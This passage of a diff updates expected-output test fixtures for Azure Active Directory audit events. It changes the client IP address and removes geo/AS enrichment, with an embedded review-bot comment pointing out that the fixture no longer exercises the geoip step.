 "tags": [
 "preserve_original_event"
@@ -997,7 +889,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -1133,7 +1025,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -1145,12 +1037,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036094700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124852900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -1176,25 +1068,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -1208,7 +1082,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -1344,7 +1218,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
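Review bot: The regenerated expected output drops every `source.geo` and `source.as` field for the new address `67.43.156.15` where the old fixture `83.57.233.151` carried full geo and AS enrichment; the refreshed `ingested` timestamps show the file was tool-generated, so this is what the test stack produced, but it also means this fixture no longer exercises the geoip step at all. If the test GeoIP database covers this address, the expected file should contain that enrichment, so confirm the pipeline's geoip processor still runs under test rather than silently yielding nothing. The same drop repeats in `@@ -1387,25 +1261,7 @@` and `@@ -1598,25 +1454,7 @@`. The `event.ingested` values are nondeterministic and will churn on every regeneration; marking `event.ingested` as a dynamic field in the pipeline test config would keep future diffs to real changes. The enclosing event object starts before this hunk.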
@@ -1356,12 +1230,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036101400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124859400Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link 